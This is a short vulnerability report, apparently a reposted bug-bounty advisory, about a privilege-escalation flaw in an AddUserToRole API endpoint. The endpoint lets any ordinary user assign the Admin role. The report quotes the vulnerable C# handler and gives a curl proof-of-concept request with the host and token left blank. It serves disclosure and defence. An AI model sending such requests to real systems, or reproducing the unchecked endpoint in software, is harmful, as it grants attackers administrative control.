Normal user can set himself or any other user to admin role
Discription

# Description
Improper access to an API endpoint`AddUserToRole` can allow a regular user to escalate his privileges to be an admin

# Infected code
“`
[Authorize(Roles = Roles.User)]
[HttpPost]
public async Task AddUserToRole([FromQuery] string username, string role)
{
var results = await _auth.AddUserToRoleAsync(username, role);
if (!results.IsSuccess)
return BadRequest(results);
return Ok(results);
}
“`
As seen it just allows a user role to access this endpoint and no proper checks for what role can be added So it can be an admin role
# Proof of Concept
“`
curl -X ‘POST’
http:///Auth/AddUserToRole?username=&role=Admin’
-H ‘accept: */*’
-H ‘Authorization: ‘
-d ”
“`Read More

Back to Main

Subscribe for the latest news:
Generated by Feedzy
%d bloggers like this: